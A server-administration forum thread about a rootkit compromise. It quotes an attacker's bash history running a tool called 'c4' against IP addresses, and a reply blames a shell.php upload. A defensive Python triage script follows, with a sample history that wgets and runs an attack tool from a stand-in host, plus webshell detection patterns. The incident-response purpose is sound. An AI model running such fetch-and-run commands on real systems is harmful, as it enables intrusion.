chkrootkit and rkhunter report that there are traces of several rootkits installed.
First I tried to clean manually following the recipes found on this forum and elsewhere on the net, but I could not do even the first steps (I could not save /etc/rc.d/rc.sysinit after removing xntps from it - why? I don't know).
So, I decided to choose the way many seem to prefer - asking a reinstall of the OS and setting up things from backups.
Before I ask for the format, though, it would be nice to find out something about the possible gate for my guests and also what they are doing and who they are.
Is it possible to trace them somehow?
I noticed two possible clues:
1) Clue 1
In /root/bash_history I find:
./c4 -h 18.104.22.168
./c4 -h 22.214.171.124
./c4 -h 126.96.36.199
./c4 -d 200.158.70 -s 200
The shell.php is most likely the entrance point, I've seen it myself before on our demo account before we locked it down.
Sounds like they found a site you're hosting that has an exploit and used it to upload the shell.php, and then after that used the shell to download and execute the rootkits.
It's also possible that you offer a demo acct and since cpanel isn't the best at securing demo accounts, they could've easily uploaded the shell script. If you do offer a demo account, do 'chmod 000 /home/demoacct' to make it so no files can be in there.
Unfortunately, sounds like they are in India, and you won't be able to do much about it if that is the situation.
Steven Ciaburri | Industry's Best Server Management- Rack911.com
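As an added example (not from the thread), the triage the reply describes can be scripted: pull the fetch/run lines and the IP addresses out of root's shell history, and flag PHP files under the docroot where request input flows into an execution sink, which is the usual shape of a shell.php. The history sample is constructed to mirror the one quoted above, with TEST-NET addresses standing in for the real ones; the sink/source lists are a heuristic, not a complete signature set.

```python
import re
from pathlib import Path

# Constructed sample of a root .bash_history, shaped like the one quoted in the
# thread (TEST-NET addresses stand in for the real ones).
SAMPLE_HISTORY = """\
cd /tmp
wget http://203.0.113.10/c4.tgz
tar xzf c4.tgz
./c4 -h 203.0.113.5
./c4 -d 203.0.113 -s 200
ls -la
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# A history line that fetches something or runs a file out of the working
# directory is the first thing to pull out during triage.
FETCH_OR_RUN = re.compile(r"^(?:wget|curl|\./\S+|chmod\s+\+x|perl\s+\S+|python\s+\S+)")

def triage_history(text):
    """Map each fetch/run line to the IPv4 addresses it mentions (may be empty)."""
    findings = {}
    for line in text.splitlines():
        line = line.strip()
        if FETCH_OR_RUN.match(line):
            findings[line] = IPV4.findall(line)
    return findings

# Webshell heuristic: request input (or a decoder) paired with an execution sink.
SINK_RE = re.compile(r"\b(eval|system|exec|shell_exec|passthru|popen|proc_open|assert)\s*\(")
SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE", "base64_decode")

def webshell_indicators(php_source):
    """Return (sinks, sources); a file with both is a candidate for manual review."""
    sinks = sorted(set(SINK_RE.findall(php_source)))
    sources = [s for s in SOURCES if s in php_source]
    return sinks, sources

def scan_php_tree(root):
    """Walk a docroot and list .php files that pair an input source with a sink."""
    hits = []
    for path in Path(root).rglob("*.php"):
        sinks, sources = webshell_indicators(path.read_text(errors="replace"))
        if sinks and sources:
            hits.append((str(path), sinks, sources))
    return hits

if __name__ == "__main__":
    for cmd, ips in triage_history(SAMPLE_HISTORY).items():
        print(f"{cmd!r:45} -> {ips}")
```

The addresses it reports are where the attacker pulled tools from or aimed them at, which is what you hand to the hosting provider or abuse contact; expect the webshell scan to need a manual pass, since legitimate admin tools also use these functions.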